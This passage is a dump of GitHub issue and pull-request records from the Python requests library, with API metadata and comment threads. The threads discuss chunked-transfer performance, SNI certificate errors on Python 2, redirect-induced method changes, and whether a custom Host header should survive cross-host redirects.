chunked handling is almost certainly the problem, and I'm not really\n> surprised that go handles it better, especially as chunked is the default\n> HTTP mode for go.\n> \n> However, requests being fast than a raw socket is...unexpected!\n> \n> One thing worth noting: if the socket wasn't decoding the chunked encoding\n> in the previous tests then it got an unfair advantage, as it was actually\n> reading less data than the other methods were! They were all reading the\n> chunked headers as well as the 8GB of data.\n> \n> This leads to a follow-on question: do we still think all of these methods\n> are actually reading the same amount of data?\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-65833299\n> .\n", "I wouldn't be surprised if this is related to the chunk size that we're reading off the socket at a time. \n", "Cake for @alex for being super helpful :cake:\n", "@nelhage did some stracing of the various examples (in the transfer\nencoding: chunked case) https://gist.github.com/nelhage/dd6490fbc5cfb815f762\nare the results. It looks like there's a bug in httplib which results in it\nnot always reading a full chunk off the socket.\n\nOn Mon Dec 08 2014 at 9:05:14 AM Kenneth Reitz [email protected]\nwrote:\n\n> Cake for @alex https://github.com/alex for being super helpful [image:\n> :cake:]\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-66147998\n> .\n", "So what we have here is a bug in a standard library that no one is really maintaining? (@Lukasa has at least 2 patch sets that have been open for >1 year.) Maybe I'll raise a stink on a list somewhere tonight\n", "Someone (I might get to it, unclear) probably needs to drill down with pdb\nor something and figure out what exact code is generating those 20-byte\nreads so we can put together a good bug report.\n\nOn Mon Dec 08 2014 at 9:14:09 AM Ian Cordasco [email protected]\nwrote:\n\n> So what we have here is a bug in a standard library that no one is really\n> maintaining? (@Lukasa https://github.com/Lukasa has at least 2 patch\n> sets that have been open for >1 year.) Maybe I'll raise a stink on a list\n> somewhere tonight\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-66149522\n> .\n", "I'll try to fit that in tonight or tomorrow if no one else gets to it.\n", "So, any news on the root cause? What's generating these short reads, and how much does the situation improve without them?\n", "@kislyuk Not as far as I'm aware. Hopefully I'll have some time to chase it down this christmas holiday.\n", "Thanks @Lukasa. I'm dealing with a performance issue where download speed on a chunked response using urllib3/requests is much slower than with curl and other libraries, and trying to understand if this is the culprit.\n" ]
https://api.github.com/repos/psf/requests/issues/2370
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2370/labels{/name}
https://api.github.com/repos/psf/requests/issues/2370/comments
https://api.github.com/repos/psf/requests/issues/2370/events
https://github.com/psf/requests/issues/2370
50,959,784
MDU6SXNzdWU1MDk1OTc4NA==
2,370
question of urlencode
{ "avatar_url": "https://avatars.githubusercontent.com/u/924733?v=4", "events_url": "https://api.github.com/users/wangcc/events{/privacy}", "followers_url": "https://api.github.com/users/wangcc/followers", "following_url": "https://api.github.com/users/wangcc/following{/other_user}", "gists_url": "https://api.github.com/users/wangcc/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/wangcc", "id": 924733, "login": "wangcc", "node_id": "MDQ6VXNlcjkyNDczMw==", "organizations_url": "https://api.github.com/users/wangcc/orgs", "received_events_url": "https://api.github.com/users/wangcc/received_events", "repos_url": "https://api.github.com/users/wangcc/repos", "site_admin": false, "starred_url": "https://api.github.com/users/wangcc/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/wangcc/subscriptions", "type": "User", "url": "https://api.github.com/users/wangcc", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-12-04T10:36:47Z
2021-09-08T23:06:52Z
2014-12-04T10:41:29Z
NONE
resolved
{ "avatar_url": "https://avatars.githubusercontent.com/u/924733?v=4", "events_url": "https://api.github.com/users/wangcc/events{/privacy}", "followers_url": "https://api.github.com/users/wangcc/followers", "following_url": "https://api.github.com/users/wangcc/following{/other_user}", "gists_url": "https://api.github.com/users/wangcc/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/wangcc", "id": 924733, "login": "wangcc", "node_id": "MDQ6VXNlcjkyNDczMw==", "organizations_url": "https://api.github.com/users/wangcc/orgs", "received_events_url": "https://api.github.com/users/wangcc/received_events", "repos_url": "https://api.github.com/users/wangcc/repos", "site_admin": false, "starred_url": "https://api.github.com/users/wangcc/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/wangcc/subscriptions", "type": "User", "url": "https://api.github.com/users/wangcc", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2370/reactions" }
https://api.github.com/repos/psf/requests/issues/2370/timeline
null
completed
null
null
false
[ "Hey @wangcc I expect you resolved whatever problem you had. In the future, please don't delete the description of the issue, even if you filed it on the wrong project. Issues that have had their content edited out are confusing and unhelpful to most people.\n" ]
https://api.github.com/repos/psf/requests/issues/2369
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2369/labels{/name}
https://api.github.com/repos/psf/requests/issues/2369/comments
https://api.github.com/repos/psf/requests/issues/2369/events
https://github.com/psf/requests/pull/2369
50,913,544
MDExOlB1bGxSZXF1ZXN0MjU0NjQ2MDE=
2,369
Set connection timeouts for HTTPS proxy attempts.
{ "avatar_url": "https://avatars.githubusercontent.com/u/234019?v=4", "events_url": "https://api.github.com/users/kevinburke/events{/privacy}", "followers_url": "https://api.github.com/users/kevinburke/followers", "following_url": "https://api.github.com/users/kevinburke/following{/other_user}", "gists_url": "https://api.github.com/users/kevinburke/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kevinburke", "id": 234019, "login": "kevinburke", "node_id": "MDQ6VXNlcjIzNDAxOQ==", "organizations_url": "https://api.github.com/users/kevinburke/orgs", "received_events_url": "https://api.github.com/users/kevinburke/received_events", "repos_url": "https://api.github.com/users/kevinburke/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kevinburke/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kevinburke/subscriptions", "type": "User", "url": "https://api.github.com/users/kevinburke", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2014-12-04T00:33:48Z
2021-09-08T09:01:10Z
2014-12-04T02:57:41Z
CONTRIBUTOR
resolved
Fixes #2336
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2369/reactions" }
https://api.github.com/repos/psf/requests/issues/2369/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2369.diff", "html_url": "https://github.com/psf/requests/pull/2369", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2369.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2369" }
true
[ "@kevinburke Wrong repo. ;) Merge to urllib3 first, then we'll take the fix.\n", "Sorry, that wasn't clear, it's been a long day (just got off a flight, LHR -> SFO).\n\nWhat I meant was: we'll bring in a whole urllib3 when we move to the next release, so we shouldn't merge an individual fix.\n" ]
https://api.github.com/repos/psf/requests/issues/2368
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2368/labels{/name}
https://api.github.com/repos/psf/requests/issues/2368/comments
https://api.github.com/repos/psf/requests/issues/2368/events
https://github.com/psf/requests/issues/2368
50,911,684
MDU6SXNzdWU1MDkxMTY4NA==
2,368
api.dribbble.com SSL certificate does not validate
{ "avatar_url": "https://avatars.githubusercontent.com/u/1097349?v=4", "events_url": "https://api.github.com/users/joealcorn/events{/privacy}", "followers_url": "https://api.github.com/users/joealcorn/followers", "following_url": "https://api.github.com/users/joealcorn/following{/other_user}", "gists_url": "https://api.github.com/users/joealcorn/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/joealcorn", "id": 1097349, "login": "joealcorn", "node_id": "MDQ6VXNlcjEwOTczNDk=", "organizations_url": "https://api.github.com/users/joealcorn/orgs", "received_events_url": "https://api.github.com/users/joealcorn/received_events", "repos_url": "https://api.github.com/users/joealcorn/repos", "site_admin": false, "starred_url": "https://api.github.com/users/joealcorn/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/joealcorn/subscriptions", "type": "User", "url": "https://api.github.com/users/joealcorn", "user_view_type": "public" }
[]
closed
true
null
[]
null
9
2014-12-04T00:09:04Z
2021-09-08T23:06:53Z
2014-12-04T14:38:21Z
CONTRIBUTOR
resolved
Built something with dribbble's API recently and noticed this. This very may well be the fault of dribbble, but I don't know enough to diagnose. It works in browsers and curl, so it seems something's up with requests. ssllabs shows the cert presented as a wildcard certificate https://www.ssllabs.com/ssltest/analyze.html?d=api.dribbble.com However when connecting with requests 2.5.0 on python 2.7.8 an `SSLError` is raised `SSLError: hostname 'api.dribbble.com' doesn't match either of 'dribbble.com', 'www.dribbble.com'`
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2368/reactions" }
https://api.github.com/repos/psf/requests/issues/2368/timeline
null
completed
null
null
false
[ "(Pdb) self.sock.getpeercert()\n{'notAfter': 'Mar 26 12:00:00 2015 GMT', 'subjectAltName': (('DNS', 'dribbble.com'), ('DNS', 'www.dribbble.com')), 'subject': ((('businessCategory', u'Private Organization'),), (('1.3.6.1.4.1.311.60.2.1.3', u'US'),), (('1.3.6.1.4.1.311.60.2.1.2', u'Massachusetts'),), (('serialNumber', u'001031096'),), (('streetAddress', u'Ste. 202'),), (('streetAddress', u'16 Front St.'),), (('postalCode', u'01970'),), (('countryName', u'US'),), (('stateOrProvinceName', u'Massachusetts'),), (('localityName', u'Salem'),), (('organizationName', u'Dribbble LLC'),), (('commonName', u'dribbble.com'),))}\n\nSo, the ssl package is telling us it does not have a wildcard. This is really strange because both ssllabs and symantec(https://ssltools.websecurity.symantec.com/checker/views/certCheck.jsp) are saying it presents as a wildcard.\n\nI think there's something up with dribbble because I can send requests to soundcloud over ssl just fine. \n", "I'm travelling, so I can't debug this properly, but my first instinct is that this is an SNI issue. Does it work fine using requests + Python 3?\n", "So that's also my first instinct @Lukasa but I don't think `getpeercert` would remove a wildcard `subjectAltName` entry randomly. Still, I'd like to know from @EthanBlackburn or @buttscicles what happens on Python 3 (preferably 3.3 or 3.4).\n", "```\nPython 3.3.5 (default, Sep 29 2014, 15:50:30)\n[GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.51)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import requests\n>>> requests.__version__\n'2.5.0'\n>>> requests.get('https://api.dribbble.com')\n<Response [200]>\n>>>\n```\n", "Yeah... so it would seem our intuition was correct. Can you try again on python 2.x after doing `pip install -U requests[security]`?\n", "We have a winner! SNI is the problem here.\n\nYou can fix this problem on Python 2 by following the [SNI instructions here](https://stackoverflow.com/questions/18578439/using-requests-with-tls-doesnt-give-sni-support/18579484#18579484).\n", "I beat @Lukasa to commenting on an issue! Holy smokes!\n", "The `-U` flag didn't seem to work for the bundle, I had to uninstall and then reinstall, but that did work, thank you!\n", "In the future there's also `--force-reinstall` :)\n" ]
https://api.github.com/repos/psf/requests/issues/2367
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2367/labels{/name}
https://api.github.com/repos/psf/requests/issues/2367/comments
https://api.github.com/repos/psf/requests/issues/2367/events
https://github.com/psf/requests/issues/2367
50,891,603
MDU6SXNzdWU1MDg5MTYwMw==
2,367
requests.post() issues a GET with verify=False on insecure ssl environment
{ "avatar_url": "https://avatars.githubusercontent.com/u/1216869?v=4", "events_url": "https://api.github.com/users/kevinlondon/events{/privacy}", "followers_url": "https://api.github.com/users/kevinlondon/followers", "following_url": "https://api.github.com/users/kevinlondon/following{/other_user}", "gists_url": "https://api.github.com/users/kevinlondon/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kevinlondon", "id": 1216869, "login": "kevinlondon", "node_id": "MDQ6VXNlcjEyMTY4Njk=", "organizations_url": "https://api.github.com/users/kevinlondon/orgs", "received_events_url": "https://api.github.com/users/kevinlondon/received_events", "repos_url": "https://api.github.com/users/kevinlondon/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kevinlondon/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kevinlondon/subscriptions", "type": "User", "url": "https://api.github.com/users/kevinlondon", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2014-12-03T20:54:47Z
2021-09-08T23:06:53Z
2014-12-03T21:52:49Z
NONE
resolved
I did a search to see if I could find any similar issues prior to filing the bug. It seems like something within the way urllib3 is behaving, in particular, but I'm not sure. I have an API endpoint where GET is disabled so only POST and OPTIONS are valid methods. It works fine when I interact with it when it's hosted on HTTP but when I host it over HTTPS, the response is a 405. It behaves the same if I'm using either `requests.post()` or `requests.Session().post()`. Specifically, here's an example of the request / response cycle: ``` >>> resp = requests.Session().post(url, headers=self._headers, verify=False) >>> resp.content '{"code": 405, "total": null, "version": 1, "errors": [{"message": "Method \'GET\' not allowed."}]' ``` On an HTTP environment, with the same call (including `verify=False`), I get the expected response. I've also been able to successfully hit the same URL with the same headers using Postman and cURL without issue on the HTTPS server. Is this a bug with the library or am I doing something wrong?
{ "avatar_url": "https://avatars.githubusercontent.com/u/1216869?v=4", "events_url": "https://api.github.com/users/kevinlondon/events{/privacy}", "followers_url": "https://api.github.com/users/kevinlondon/followers", "following_url": "https://api.github.com/users/kevinlondon/following{/other_user}", "gists_url": "https://api.github.com/users/kevinlondon/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kevinlondon", "id": 1216869, "login": "kevinlondon", "node_id": "MDQ6VXNlcjEyMTY4Njk=", "organizations_url": "https://api.github.com/users/kevinlondon/orgs", "received_events_url": "https://api.github.com/users/kevinlondon/received_events", "repos_url": "https://api.github.com/users/kevinlondon/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kevinlondon/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kevinlondon/subscriptions", "type": "User", "url": "https://api.github.com/users/kevinlondon", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2367/reactions" }
https://api.github.com/repos/psf/requests/issues/2367/timeline
null
completed
null
null
false
[ "What is the output of `resp.history`. It's plausible you're being redirected and the status code we're getting is causing us to switch the request to a `GET` (as we should be).\n", "Ah, okay. Thank you for the pointer. In history was a Response [301] and I traced it to the fact that nginx was redirecting me from http:// to https:// with the response. I should have used HTTPS to begin with. Thanks for the help!\n" ]
https://api.github.com/repos/psf/requests/issues/2366
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2366/labels{/name}
https://api.github.com/repos/psf/requests/issues/2366/comments
https://api.github.com/repos/psf/requests/issues/2366/events
https://github.com/psf/requests/issues/2366
50,789,806
MDU6SXNzdWU1MDc4OTgwNg==
2,366
redirected request with a wrong host header
{ "avatar_url": "https://avatars.githubusercontent.com/u/860837?v=4", "events_url": "https://api.github.com/users/hakulat/events{/privacy}", "followers_url": "https://api.github.com/users/hakulat/followers", "following_url": "https://api.github.com/users/hakulat/following{/other_user}", "gists_url": "https://api.github.com/users/hakulat/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/hakulat", "id": 860837, "login": "hakulat", "node_id": "MDQ6VXNlcjg2MDgzNw==", "organizations_url": "https://api.github.com/users/hakulat/orgs", "received_events_url": "https://api.github.com/users/hakulat/received_events", "repos_url": "https://api.github.com/users/hakulat/repos", "site_admin": false, "starred_url": "https://api.github.com/users/hakulat/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/hakulat/subscriptions", "type": "User", "url": "https://api.github.com/users/hakulat", "user_view_type": "public" }
[]
closed
true
null
[]
null
13
2014-12-03T06:43:23Z
2021-09-08T23:05:54Z
2014-12-18T08:45:06Z
NONE
resolved
for example: r = requests.get(url, allow_redirects=True, headers={"Host":"www.baidu.com"}) first response is: 302 with location: http://www.abc.com/index.html then the followed request is also with the Host of www.baidu.com, for 302 location is a abs Request-URI, should not the request with the host of www.abc.com?
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2366/reactions" }
https://api.github.com/repos/psf/requests/issues/2366/timeline
null
completed
null
null
false
[ "Hi @wttang \n\nFor the most part, we actively discourage users from specifying they're own `Host` header. Because we discourage users from handling their own `Host` header, we do not remove it on redirect because 99% of the time there's no need for us to do so. By specifying this header yourself and not handling redirects yourself, we continue using the `Host` header.\n\nWe very well could just always attempt to remove the `Host` header but I'm -0.5 on this matter because it will almost certainly be removed by someone in the future regardless of how well we comment the surrounding lines of code. If you're making requests that require you to override things like this from requests, you should be prepared to also be handling redirects yourself.\n", "I don't think we can remove the host header on redirect. If the user specifies the host header they're suggesting that they know more than we do, and in that situation we shouldn't override it.\n", "Yeah. I agree with @Lukasa. By specifying a custom header like this, you're basically asserting that you know what you want to happen and if something unexpected happens then you have to remedy it, even if that means having to manually handle redirects\n", "the behavior of requests is not the same with a modern broswer. just try www2.baidu.com,\nI think the behavior of chrome or firefox is more reasonable\n", "@wttang It's not at all clear to me what you mean by that. www2.baidu.com works fine. Chrome or Firefox don't let you choose what host header you set, so they don't have _any_ behaviour in this situation.\n", "@Lukasa ok, i got it. you could try with curl -H\"Host: xxx.yyy.com\" url. (curl/7.19.7)\nthe behavior of curl is also use new-host header, if a 302 return, not user set one.\n", "@wttang Yeah, here we have a philosophical difference with cURL.\n\nWhen you override our default headers we assume that you know better than us. This affects all kinds of things. For example, when you set the `Host` header we change the way we handle cookies. However, the API doesn't have the flexibility for you to be able to set the boundary for your pre-existing knowledge. You can't say \"the Host header should be this value, but only if we aren't redirected off-host, and use the old host header for cookie values, but use the new host header to validate the TLS certificate\". That's just too complicated to specify.\n\nSo instead we just pick which of those we think will apply and _always_ apply it. This means you can easily work out what a redirect will look like from your original command line, we don't mutate it under your feet to remove the special knowledge. I value that kind of transparency.\n\nThe other option is to say \"sure, you know more than us, but the second you get redirected you don't\". That will work fine too. However, it pushes the problem onto different users. Users who like our current behaviour (\"leave Host set as-is\") will need to change their code, while you won't.\n\nI don't think either position is correct or right (though if @bagder has time I'd love his input on why cURL chose its behaviour), and in that sort of situation I will always prefer the status quo.\n\nI think this is \"working as intended\".\n", "First out, we (curl) picked our behavior many moons ago so this is something that has basically worked like this \"forever\" (since Sep 2004 to be exact). And to be clear: curl actually checks if the redirect is to a new host name and only then it disables the custom one, so if the redirect goes to the same host name as the original one it still allows the custom Host:.\n\nThe reason I went with this is that after a redirect that you allow curl to follow, you can basically not get the custom header done correctly if it goes to another host name, and it is causing harm more often than good to allow the custom one after a redirect-to-other-host.\n\nIn general in curl land, we've opted to \"sensible defaults\" and keeping it fairly simple when it comes to behaviors on followed redirects since we also make it very easy for users to do the entire redirect following \"manually\" and then they can opt to do whatever they please in all requests.\n", "If i request http://a.com/ with Host header 'a.com' and receive a redirect to http://www.a.com/, requests then issues a request to the server hosting www.a.com while specifying the host header 'a.com'. This creates an infinite redirect.\n\nIn what circumstance does this behavior work as intended? I can't see it solving anything if it maintains the Host header during a redirect to an entirely different domain. I've never seen another library/program which does this. This behavior makes no sense.\n", "@dieselmachine it's working as intended because users are not supposed to set the Host header and if they do then they need to understand that there are going to be big differences in behaviour in certain cases.\n", "Curl's behavior described in comment https://github.com/kennethreitz/requests/issues/2366#issuecomment-67457623 is very sensible thus what I would expect from _HTTP library for humans_. \n", "For reference, this is how easy it is to solve the problem with urllib2.\n\n```\nreq = urllib2.Request(url)\nreq.add_unredirected_header('Host', host)\nrsp = urllib2.urlopen(req)\n```\n\nIt is impossible to properly handle this situation in requests without disabling redirects and manually processing them by reading the location header and then issuing another request.\n\nWhen would a person ever want to send the original Host header to the host contained in the redirect location? Web browsers (made \"for humans\") will not send the same Host header after a redirect, because it would break things. I would expect a library \"for humans\" to handle things similarly.\n\nWhen would the default behavior NOT break something, is what I'm wondering. I can't see a single situation where this behavior would make things work.\n", "I'm increasingly inclined to agree with this logic. I'm struggling to see what pain we'd introduce by doing this for 3.0.0.\n" ]
https://api.github.com/repos/psf/requests/issues/2365
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2365/labels{/name}
https://api.github.com/repos/psf/requests/issues/2365/comments
https://api.github.com/repos/psf/requests/issues/2365/events
https://github.com/psf/requests/pull/2365
50,590,904
MDExOlB1bGxSZXF1ZXN0MjUzMDYzNzM=
2,365
Release v2.5.0
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[]
closed
true
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
[ { "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" } ]
null
6
2014-12-01T23:04:05Z
2021-09-08T09:01:11Z
2014-12-01T23:22:17Z
CONTRIBUTOR
resolved
TODO: - [x] Tag release - [x] Upload to PyPI - [x] Create release on GitHub
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2365/reactions" }
https://api.github.com/repos/psf/requests/issues/2365/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2365.diff", "html_url": "https://github.com/psf/requests/pull/2365", "merged_at": "2014-12-01T23:22:17Z", "patch_url": "https://github.com/psf/requests/pull/2365.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2365" }
true
[ ":cake: LGTM.\n\nReady when you are @kennethreitz.\n", ":shipit: \n", "@kennethreitz wanted to get this out today and added both of us to PyPI as maintainers so I'm going to wrap this up right now.\n", "- [Tag](https://github.com/kennethreitz/requests/releases/tag/v2.5.0)\n- [Release](https://github.com/kennethreitz/requests/releases/tag/v2.5.0)\n- [PyPI](https://pypi.python.org/pypi/requests/2.5.0)\n", "omg you guys are the best\n", ":sparkles: :cake: :sparkles:\n" ]
https://api.github.com/repos/psf/requests/issues/2364
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2364/labels{/name}
https://api.github.com/repos/psf/requests/issues/2364/comments
https://api.github.com/repos/psf/requests/issues/2364/events
https://github.com/psf/requests/issues/2364
50,590,618
MDU6SXNzdWU1MDU5MDYxOA==
2,364
ConnectionError: ('Connection aborted.', BadStatusLine(""''''")) on Windows
{ "avatar_url": "https://avatars.githubusercontent.com/u/410872?v=4", "events_url": "https://api.github.com/users/greedo/events{/privacy}", "followers_url": "https://api.github.com/users/greedo/followers", "following_url": "https://api.github.com/users/greedo/following{/other_user}", "gists_url": "https://api.github.com/users/greedo/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/greedo", "id": 410872, "login": "greedo", "node_id": "MDQ6VXNlcjQxMDg3Mg==", "organizations_url": "https://api.github.com/users/greedo/orgs", "received_events_url": "https://api.github.com/users/greedo/received_events", "repos_url": "https://api.github.com/users/greedo/repos", "site_admin": false, "starred_url": "https://api.github.com/users/greedo/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/greedo/subscriptions", "type": "User", "url": "https://api.github.com/users/greedo", "user_view_type": "public" }
[]
closed
true
null
[]
null
31
2014-12-01T23:00:53Z
2018-10-20T11:29:28Z
2015-07-20T14:55:07Z
NONE
resolved
